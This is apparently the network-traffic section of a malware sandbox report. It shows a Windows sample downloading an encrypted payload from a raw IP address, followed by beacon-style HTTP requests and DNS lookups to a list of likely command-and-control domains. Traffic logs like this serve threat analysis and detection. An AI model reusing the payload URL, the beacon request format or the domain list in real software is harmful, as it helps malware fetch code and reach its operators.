                                                                                                                                    Oct 11, 2023 22:58:32.769113064 CEST53549621.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:58:53.155508995 CEST6361653192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:58:53.332053900 CEST53636161.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:13.807501078 CEST6417553192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:59:14.312978983 CEST53641751.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:34.366415024 CEST6344353192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:59:35.091145039 CEST53634431.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:54.939002991 CEST6223553192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:59:55.954035997 CEST6223553192.168.11.209.9.9.9
                                                                                                                                    Oct 11, 2023 22:59:56.969362020 CEST6223553192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 22:59:57.613934994 CEST53622351.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:57.613996029 CEST53622351.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 22:59:58.322488070 CEST53622359.9.9.9192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:15.496933937 CEST5001353192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 23:00:16.031229019 CEST53500131.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:36.055516005 CEST5327753192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 23:00:36.227343082 CEST53532771.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 23:00:56.612785101 CEST5972153192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 23:00:56.895217896 CEST53597211.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 23:01:17.157777071 CEST5078753192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 23:01:17.460161924 CEST53507871.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 23:01:37.697671890 CEST4937653192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 23:01:37.889991999 CEST53493761.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 23:01:37.890511990 CEST4937653192.168.11.209.9.9.9
                                                                                                                                    Oct 11, 2023 23:01:38.072316885 CEST53493769.9.9.9192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:18.813678026 CEST5016253192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 23:02:19.069736004 CEST53501621.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 23:02:39.355835915 CEST5844053192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 23:02:39.663219929 CEST53584401.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 23:03:20.458049059 CEST4977653192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 23:03:21.207601070 CEST53497761.1.1.1192.168.11.20
                                                                                                                                    Oct 11, 2023 23:03:43.865729094 CEST6496753192.168.11.201.1.1.1
                                                                                                                                    Oct 11, 2023 23:03:44.373981953 CEST53649671.1.1.1192.168.11.20
                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Oct 11, 2023 22:56:31.002636909 CEST192.168.11.201.1.1.10xd1d1Standard query (0)www.los3.onlineA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:56:37.672872066 CEST192.168.11.201.1.1.10x1eeaStandard query (0)www.los3.onlineA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:56:50.416889906 CEST192.168.11.201.1.1.10x16ebStandard query (0)www.start399.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:57:10.740294933 CEST192.168.11.201.1.1.10x4464Standard query (0)www.niaeoer.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:57:51.482726097 CEST192.168.11.201.1.1.10x57abStandard query (0)www.qualityquickprints.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:58:12.039556980 CEST192.168.11.201.1.1.10x6966Standard query (0)www.55dy5s.topA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:58:13.054533005 CEST192.168.11.209.9.9.90x6966Standard query (0)www.55dy5s.topA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:58:32.597459078 CEST192.168.11.201.1.1.10xad3dStandard query (0)www.easyeats307.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:58:53.155508995 CEST192.168.11.201.1.1.10x6016Standard query (0)www.doubleapus.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:13.807501078 CEST192.168.11.201.1.1.10x6fa6Standard query (0)www.holzleisten24.shopA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:34.366415024 CEST192.168.11.201.1.1.10x17a3Standard query (0)www.xlrj.asiaA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:54.939002991 CEST192.168.11.201.1.1.10xb2a8Standard query (0)www.fathomtackle.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:55.954035997 CEST192.168.11.209.9.9.90xb2a8Standard query (0)www.fathomtackle.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:56.969362020 CEST192.168.11.201.1.1.10xb2a8Standard query (0)www.fathomtackle.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:00:15.496933937 CEST192.168.11.201.1.1.10x1bc9Standard query (0)www.digitalserviceact.onlineA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:00:36.055516005 CEST192.168.11.201.1.1.10x4f11Standard query (0)www.ddbetting.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:00:56.612785101 CEST192.168.11.201.1.1.10x56cfStandard query (0)www.ps212naming.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:01:17.157777071 CEST192.168.11.201.1.1.10x4507Standard query (0)www.pwpholdings.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:01:37.697671890 CEST192.168.11.201.1.1.10xb7c9Standard query (0)www.justinmburns.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:01:37.890511990 CEST192.168.11.209.9.9.90xb7c9Standard query (0)www.justinmburns.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:02:18.813678026 CEST192.168.11.201.1.1.10x3055Standard query (0)www.senior-living-91799.bondA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:02:39.355835915 CEST192.168.11.201.1.1.10xe19aStandard query (0)www.riderarea.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:03:20.458049059 CEST192.168.11.201.1.1.10xf137Standard query (0)www.ktrandnews.comA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:03:43.865729094 CEST192.168.11.201.1.1.10xb45aStandard query (0)www.nala.devA (IP address)IN (0x0001)false
                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Oct 11, 2023 22:56:31.176006079 CEST1.1.1.1192.168.11.200xd1d1No error (0)www.los3.online172.177.169.252A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:56:37.844975948 CEST1.1.1.1192.168.11.200x1eeaNo error (0)www.los3.online172.177.169.252A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:56:50.705388069 CEST1.1.1.1192.168.11.200x16ebNo error (0)www.start399.com91.195.240.123A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:57:10.963449001 CEST1.1.1.1192.168.11.200x4464No error (0)www.niaeoer.comname.shoplazza.storeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:57:10.963449001 CEST1.1.1.1192.168.11.200x4464No error (0)name.shoplazza.store104.18.233.42A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:57:10.963449001 CEST1.1.1.1192.168.11.200x4464No error (0)name.shoplazza.store104.18.232.42A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:57:51.654177904 CEST1.1.1.1192.168.11.200x57abNo error (0)www.qualityquickprints.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:58:13.182753086 CEST1.1.1.1192.168.11.200x6966No error (0)www.55dy5s.top34.120.249.181A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:58:13.182753086 CEST1.1.1.1192.168.11.200x6966No error (0)www.55dy5s.top34.149.24.8A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:58:13.453666925 CEST9.9.9.9192.168.11.200x6966No error (0)www.55dy5s.top34.120.249.181A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:58:13.453666925 CEST9.9.9.9192.168.11.200x6966No error (0)www.55dy5s.top34.149.24.8A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:58:32.769113064 CEST1.1.1.1192.168.11.200xad3dName error (3)www.easyeats307.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:58:53.332053900 CEST1.1.1.1192.168.11.200x6016Name error (3)www.doubleapus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:14.312978983 CEST1.1.1.1192.168.11.200x6fa6No error (0)www.holzleisten24.shop130.185.109.77A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:35.091145039 CEST1.1.1.1192.168.11.200x17a3No error (0)www.xlrj.asia0826.93cu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:35.091145039 CEST1.1.1.1192.168.11.200x17a3No error (0)0826.93cu.com154.12.93.8A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:57.613934994 CEST1.1.1.1192.168.11.200xb2a8No error (0)www.fathomtackle.com154.197.227.142A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:57.613996029 CEST1.1.1.1192.168.11.200xb2a8No error (0)www.fathomtackle.com154.197.227.142A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 22:59:58.322488070 CEST9.9.9.9192.168.11.200xb2a8No error (0)www.fathomtackle.com154.197.227.142A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:00:16.031229019 CEST1.1.1.1192.168.11.200x1bc9No error (0)www.digitalserviceact.online185.104.28.238A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:00:36.227343082 CEST1.1.1.1192.168.11.200x4f11No error (0)www.ddbetting.comddbetting.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:00:36.227343082 CEST1.1.1.1192.168.11.200x4f11No error (0)ddbetting.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:00:36.227343082 CEST1.1.1.1192.168.11.200x4f11No error (0)ddbetting.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:00:56.895217896 CEST1.1.1.1192.168.11.200x56cfNo error (0)www.ps212naming.com208.91.197.39A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:01:17.460161924 CEST1.1.1.1192.168.11.200x4507No error (0)www.pwpholdings.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:01:17.460161924 CEST1.1.1.1192.168.11.200x4507No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:01:17.460161924 CEST1.1.1.1192.168.11.200x4507No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:01:17.460161924 CEST1.1.1.1192.168.11.200x4507No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:01:37.889991999 CEST1.1.1.1192.168.11.200xb7c9Server failure (2)www.justinmburns.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:01:38.072316885 CEST9.9.9.9192.168.11.200xb7c9Server failure (2)www.justinmburns.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:02:19.069736004 CEST1.1.1.1192.168.11.200x3055No error (0)www.senior-living-91799.bond104.247.82.94A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:02:39.663219929 CEST1.1.1.1192.168.11.200xe19aNo error (0)www.riderarea.com52.20.84.62A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:03:21.207601070 CEST1.1.1.1192.168.11.200xf137No error (0)www.ktrandnews.com158.247.235.89A (IP address)IN (0x0001)false
                                                                                                                                    Oct 11, 2023 23:03:44.373981953 CEST1.1.1.1192.168.11.200xb45aNo error (0)www.nala.dev38.242.133.61A (IP address)IN (0x0001)false
                                                                                                                                    • 103.72.68.128
                                                                                                                                    • www.start399.com
                                                                                                                                    • www.niaeoer.com
                                                                                                                                    • www.qualityquickprints.com
                                                                                                                                    • www.55dy5s.top
                                                                                                                                    • www.holzleisten24.shop
                                                                                                                                    • www.xlrj.asia
                                                                                                                                    • www.fathomtackle.com
                                                                                                                                    • www.digitalserviceact.online
                                                                                                                                    • www.ddbetting.com
                                                                                                                                    • www.ps212naming.com
                                                                                                                                    • www.pwpholdings.com
                                                                                                                                    • www.senior-living-91799.bond
                                                                                                                                    • www.riderarea.com
                                                                                                                                    • www.ktrandnews.com
                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.11.2050012103.72.68.12880C:\Users\user\Desktop\MaMsKRmgXZ.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 22:55:50.644821882 CEST0OUTGET /pcd/wAYOlXAIjrMljL79.bin HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                    Host: 103.72.68.128
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Oct 11, 2023 22:55:51.007841110 CEST1INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 11 Oct 2023 20:55:49 GMT
                                                                                                                                    Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34
                                                                                                                                    Last-Modified: Tue, 10 Oct 2023 07:35:55 GMT
                                                                                                                                    ETag: "2e440-60757c1d2747a"
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Content-Length: 189504
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Data Raw: 54 24 84 94 0b f3 36 3e 12 b2 48 15 bc fa d2 ba 88 dd 53 23 cf b2 cf fb 09 58 5e d6 33 42 b3 c4 c0 07 5a 9e 3c 2c 7d 9a df ce 65 21 e8 b0 06 1e ff ab c1 df 86 de fe c7 70 a8 fd 27 13 10 04 3b de b5 6f bc 46 b3 e5 f3 f3 fd 34 7b 07 36 c5 72 d4 01 44 dd a8 59 d3 6e 06 b9 71 b1 b5 78 98 9d 62 c9 f6 82 3a 79 33 a3 27 9a c9 be 02 7b 53 48 e0 b3 ef 45 4c e7 dd 7d a9 5a 93 28 6c 20 df 10 12 da ca 21 53 fa 86 26 66 58 6c 66 44 a4 aa 40 4d 8a 33 31 1e 4b ab 40 2e 3b 95 cc 8e ff 00 f7 44 3e 74 de 4f 10 31 4b 90 e6 3a 26 f7 18 7a 74 28 f9 01 6c 0e ae ca db 1e 3f 99 00 35 9a 5d 9c b4 9d 10 b2 ef fe f2 ff b7 0d 48 20 d4 f0 0c e2 b6 a9 49 39 0e 80 4b 02 44 f4 07 e0 d3 4a 19 f0 75 37 60 49 1f e5 a7 87 84 f5 69 ed 13 35 1b 86 71 d0 ea 49 bd 84 d8 ae f8 9e 1d f8 9f 72 5e 94 49 e7 a4 b3 6e 9a 48 6a a3 a2 7b ca 7d 65 ec c6 a1 b8 c4 92 5d ae 81 85 ba 28 df 4a c5 b0 ea e8 5f 6f 1c b2 7d e8 90 45 bd fe 41 ce 60 75 fb 10 0e ca 50 ce ce 0d 2b 26 c5 ea 89 05 b9 23 45 28 18 ba 15 01 b4 6a d0 36 13 1c 24 eb 4b 5a b5 d0 ad ec 06 08 11 bf ce fa 70 9e b5 32 12 89 f3 b8 16 3b b0 53 82 8f 64 01 94 91 90 47 dc 46 09 66 b3 47 1b 6d f4 35 4c aa 4a 3e 0d c3 ea 9a 54 08 cf 09 ea e8 ca 28 89 aa af 56 fe 95 ac b6 75 92 ed 09 4b dc 9a 9b 3a 7c 82 c8 fa 8e a7 78 50 f3 22 19 1c 35 95 c9 34 eb 4a 52 e3 e4 69 b7 e6 0d 90 64 7f e0 0d cc 32 dc ac d3 aa a1 de 07 d6 93 bf 98 dc 23 30 69 b5 0f c5 e1 94 8f 1b 3b db 05 2c b9 70 e9 cd 53 52 66 ee ee 92 63 a8 9b a0 e8 f9 8a ec 37 0f 54 35 e0 01 95 66 4b 8b ae 2d 3d ac 97 65 44 d4 30 c2 22 f9 1e ff ad c4 1f ce 58 d7 06 d4 3e da 5e f4 7c 68 64 27 88 f7 7e 59 e2 6f 89 c7 d4 c9 b7 51 04 39 f5 20 28 f2 d5 fb 93 a3 67 eb c2 f3 17 1c 41 99 4d ed 91 3e 69 78 27 eb 47 e0 26 40 62 c2 f4 ff 93 d9 bb f6 6c ba 03 99 a2 fa 08 69 13 06 39 61 31 41 c9 5a 19 80 3f 0d 1c df 30 3b 6c a8 85 9b 1b 40 51 ad 81 d8 4e e9 97 54 b9 cd 54 d4 4d f3 f4 1a d4 aa 9f bb 30 0f 67 7f a3 2b 12 e2 c7 41 39 6f 37 0d 36 ba e6 90 cb 88 09 47 00 22 7e 56 3c df 7f c1 be bc 49 46 09 8a 16 4a ce 54 24 4f 18 69 36 41 06 bd 48 e5 75 6c 5c 1e 74 62 84 96 e4 c6 16 3d a4 06 30 5e 5c d9 28 80 b1 ce a7 b5 13 ee 90 dc 7f 1b ca 11 c0 10 35 d9 b8 06 36 14 75 75 ef 45 73 76 2d fb e2 84 5e 08 27 d2 8f f2 05 0b 9f 61 0e 48 54 51 96 20 d9 0a cf 87 82 95 84 93 d9 c9 c2 29 17 c1 a7 78 8e 73 e4 a3 83 fb c5 6f 44 2a 8b 1d 1f 32 71 e1 28 ac 82 7a 00 63 97 00 da 02 6c b3 9a fc 2f f9 87 c7 b8 49 de b5 52 eb 81 c3 e4 b0 8c 7c 63 a2 9e e2 9c eb 84 0c 99 fe 9a e9 47 1b 55 60 2a 81 56 09 83 fd e0 59 cb 17 90 3e a3 f1 e6 1e 44 a8 65 c8 bc 82 fb 5c a3 f1 68 7d cc 7f 3e 74 9f 61 d3 38 a6 bc 64 86 10 b7 e2 6d fc 1a bd 40 07 e4 0f 2f 6f a0 8c 58 72 84 f4 7a e8 18 94 d0 f7 8c ba 96 12 b3 d9 5e 21 7b 10 1c 36 6c f0 22 b5 e9 dd 18 41 3a ac 86 db 21 0e c8 9d e0 53 bb e2 d8 3f 60 e1 76 1f 33 52 a8 f9 84 0a f2 0b 13 b6 74 53 c6 fe 1b 99 40 0a 7b 59 d5 2a c0 cd df ba da d1 91 65 a1 f5 aa cc 89 e9 9a 43 bd 1a ff f6 6c 09 51 14 85 23 42 49 06 e0 11 5c e3 c4 05 b1 94 57 63 83 47 bf ae d5 02 2d 47 73 ff 77 97 ac 1d bb dc b6 78 09 85 78 c5 67 64 01 5f a7 a8 c7 c4 f1
                                                                                                                                    Data Ascii: T$6>HS#X^3BZ<,}e!p';oF4{6rDYnqxb:y3'{SHEL}Z(l !S&fXlfD@M31K@.;D>tO1K:&zt(l?5]H I9KDJu7`Ii5qIr^InHj{}e](J_o}EA`uP+&#E(j6$KZp2;SdGFfGm5LJ>T(VuK:|xP"54JRid2#0i;,pSRfc7T5fK-=eD0"X>^|hd'~YoQ9 (gAM>ix'G&@bli9a1AZ?0;l@QNTTM0g+A9o76G"~V<IFJT$Oi6AHul\tb=0^\(56uuEsv-^'aHTQ )xsoD*2q(zcl/IR|cGU`*VY>De\h}>ta8dm@/oXrz^!{6l"A:!S?`v3RtS@{Y*eClQ#BI\WcG-Gswxxgd_
                                                                                                                                    Oct 11, 2023 22:55:51.007936001 CEST3INData Raw: 07 32 bd 5e 78 44 65 f8 64 86 04 b0 05 56 f2 cc 4d fc e2 00 c4 52 86 9e 0e b9 6d 6b 07 8f bd 37 71 45 f8 c2 71 6a 93 c8 48 c7 8c b8 76 83 1b cb ea 21 f5 f9 a2 f1 e0 5d 56 df 29 51 7d 33 c4 bc a8 41 83 2f 5d a2 58 9a 93 0f f0 29 73 15 99 09 1c 90
                                                                                                                                    Data Ascii: 2^xDedVMRmk7qEqjHv!]V)Q}3A/]X)sj<mJKF|mEu0p9o-H9MI0\9^"#`\Psq{}nX2Aa(>/(4j"vUD,a+(gN~X]"h `v
                                                                                                                                    Oct 11, 2023 22:55:51.007992029 CEST4INData Raw: 5d 56 df 29 51 7d 33 c4 bc a8 41 83 2f 5d a2 58 9a 93 0f f0 29 73 15 99 09 1c 90 e4 dd 6a 1e ec a3 3c 6d f2 bc 4a 4b e3 89 46 05 fe 87 7c e2 a8 18 97 6d da f7 45 bf f8 ca 75 cf ad 83 30 81 d4 95 82 70 39 6f 7f e0 2d e2 08 48 cc c9 fc 39 88 9f 4d
                                                                                                                                    Data Ascii: ]V)Q}3A/]X)sj<mJKF|mEu0p9o-H9MI0\9^"#`\Psq{}nX2Aa(>/(4j"vUD,a+(gN~X]"h `v'e`h#FUh'q[-=?M6j*
                                                                                                                                    Oct 11, 2023 22:55:51.008085966 CEST5INData Raw: f8 ca 75 cf ad 83 30 81 d4 95 82 70 39 6f 7f e0 2d e2 08 48 cc c9 fc 39 88 9f 4d 49 30 b5 19 c4 cf 01 f9 bd 93 92 fb 99 cc 1c 5c fb b0 e7 39 cf ae c0 cb 5e 22 ce 23 7f 60 8d dc d5 5c a5 50 73 71 7b bd 7d 6e f9 8a 58 32 41 e8 61 8f 1e 28 8a 13 3e
                                                                                                                                    Data Ascii: u0p9o-H9MI0\9^"#`\Psq{}nX2Aa(>/(4j"vUD,a+(gN~X]"h `v'e`h#FUh'q[-=?M6j*=P.yNTb:y3'{SHEL}Z( p/SN
                                                                                                                                    Oct 11, 2023 22:55:51.369992018 CEST7INData Raw: f4 2d 79 ed 82 54 94 1f 7f fa 36 b5 2a e3 8c 62 b0 97 bf 17 9e 04 4b c0 01 56 d2 a4 65 6f 48 23 70 4f fe 4e d8 16 e3 6d d0 f5 06 e4 dc 13 16 d8 59 a7 63 3c e8 a8 c9 a9 41 c1 1b 42 92 d3 18 a3 1d 8a b3 10 ce 4c 73 6f 3d 6e a3 22 04 94 6e 28 87 3d
                                                                                                                                    Data Ascii: -yT6*bKVeoH#pONmYc<ABLso=n"n(=e6Z3plhsSB8t=yh,o \%{*0!X:yBJktV8U.Y=]<',-P3";G\RuD*_
                                                                                                                                    Oct 11, 2023 22:55:51.370032072 CEST8INData Raw: ae a0 2a 2a 32 81 a7 aa 13 32 94 64 16 4a 93 df 1b f6 04 86 4d 3a 94 c2 dc fc 25 fa a5 48 fb 47 ed 53 bd 63 aa 0b df 90 68 39 f4 75 a0 d2 6e 80 c0 57 17 f8 c8 4e 91 1b 03 b6 4e 6b cd cd 37 ef 14 d5 11 c4 95 c3 bf 34 20 37 68 f1 42 57 c7 22 51 08
                                                                                                                                    Data Ascii: **22dJM:%HGSch9unWNNk74 7hBW"QX/cQoF0mf6u&a6AM'6I2T8 `~YlT9d=TnA>Wti68TfHB\nC`@Oz=d~WU'i-
                                                                                                                                    Oct 11, 2023 22:55:51.370531082 CEST9INData Raw: 1b 1e 46 83 44 37 8f da 6e 10 d5 f3 a5 b8 f3 34 76 c9 4a 6c f1 cb d6 2a b9 fa 4a ad 56 67 af 95 ce 5a a2 89 d1 9c 65 62 9d 9f c4 b0 5e be b6 db da 65 36 f0 38 41 27 8f 65 cf 12 ba b3 f9 d7 77 bd 9d 16 a8 51 df 20 cb 55 8c e2 e8 d6 ca 72 14 b8 ea
                                                                                                                                    Data Ascii: FD7n4vJl*JVgZeb^e68A'ewQ Urk,B{-HHPu2+xrM6dBIf6[$W98G"DOPj|dS0z#Fo@{'y?kl{\JJR$9mBkP8du,mRk
                                                                                                                                    Oct 11, 2023 22:55:51.370573997 CEST11INData Raw: cd 88 44 10 ba 65 8e 3d 34 6e df ff df 53 df 9b d8 d5 4b b7 aa 23 b9 70 14 2d 69 af 5f 4e 00 8a df db 06 6b 38 e2 d0 0b b7 37 a1 4a 50 84 af 36 01 f7 9b 6a 4c 90 9d 99 54 09 a8 93 83 33 a0 d6 ab f3 d9 84 b7 e7 26 43 26 c5 c0 8e ad bd 6a 9a 19 97
                                                                                                                                    Data Ascii: De=4nSK#p-i_Nk87JP6jLT3&C&jfnaC7D :R~Nkz,UvB{}?kJh5+CO;mzvy:|W7ogOK3}v>M?KgmNnJ/w8aW0[t
                                                                                                                                    Oct 11, 2023 22:55:51.370606899 CEST12INData Raw: 68 58 e6 48 d1 6a 4a a8 d6 bb d5 a5 47 ce a5 d3 3e 2e c5 f8 d7 49 b2 5d d8 e8 e6 9e e7 99 d1 5b 4d 81 dd e8 d7 66 c4 93 c8 91 ce 6e 01 fc 5e e2 d2 8d bb 20 67 9e ba 57 86 b6 7e f8 1a 05 57 bf 44 ba 2f 63 f5 ad 22 d2 d8 f8 f4 58 13 b6 42 a2 56 19
                                                                                                                                    Data Ascii: hXHjJG>.I][Mfn^ gW~WD/c"XBV"Ytf0tQqQiRXG;/C4,:$5.o'qAC8<vK4'8GJ%7 5oN6_/O)y#$XoZ02sDnV2eUh#eYj
                                                                                                                                    Oct 11, 2023 22:55:51.370654106 CEST13INData Raw: 28 80 b6 80 24 11 9b 36 3d 41 04 47 8d 4b 42 b9 2c 32 58 ad 3a 2d 0c 35 13 2a 61 36 59 58 74 6f c6 b8 e7 de e7 34 25 8e ef 6b ad 39 21 0b 36 48 e0 2b 83 39 5a 3d a5 55 69 c6 18 ad 5c 0a 24 02 27 48 af ae 75 6d 75 38 4c 8d 6c 68 86 87 8b c8 0a 4c
                                                                                                                                    Data Ascii: ($6=AGKB,2X:-5*a6YXto4%k9!6H+9Z=Ui\$'Humu8LlhLrbd=9XJs+l^6UM;>gJ.vV9tJ!76TYIv9\-`=`)q$ :'kF"Th4rJ1[Y=
                                                                                                                                    Oct 11, 2023 22:55:51.370975018 CEST15INData Raw: 72 be b0 5b 3a 54 29 cb 22 9d e8 e8 5f e4 60 0a 79 29 57 4d 9e d0 cb b3 8c a4 04 08 8f dd ad ce ce 0d 58 7a 7d fe 02 78 45 12 1c 30 dc 45 1c 88 e9 9e 5b 6b e6 dd de fb ca bd 4a d0 ad 1c 8f 74 a9 b9 4f 19 8f 9e b5 32 9b d5 2b 3d d7 f4 b0 92 49 97
                                                                                                                                    Data Ascii: r[:T)"_`y)WMXz}xE0E[kJtO2+=IWl?fGy[N(7R}TndtWA("3R4JRhvknRD]iN62-Lf?0a+vKA4 ,z@b(=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    1192.168.11.205001591.195.240.12380C:\Windows\explorer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Oct 11, 2023 22:56:51.023724079 CEST203OUTGET /ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKP HTTP/1.1
                                                                                                                                    Host: www.start399.com
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii:
                                                                                                                                    Oct 11, 2023 22:56:51.372153997 CEST204INHTTP/1.1 200 OK
                                                                                                                                    date: Wed, 11 Oct 2023 20:56:51 GMT
                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                    transfer-encoding: chunked
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    x-powered-by: PHP/8.1.17
                                                                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                    pragma: no-cache
                                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_VLzKS74+824+4HtmM9a+fAnHtwkPBgMegMeqkhbf2kFkxSkoy14LxCY7WFkmWCZeNlnfp/79rdEcxnr+har3uA==
                                                                                                                                    last-modified: Wed, 11 Oct 2023 20:56:51 GMT
                                                                                                                                    x-cache-miss-from: parking-697977dd84-w289q
                                                                                                                                    server: NginX
                                                                                                                                    connection: close
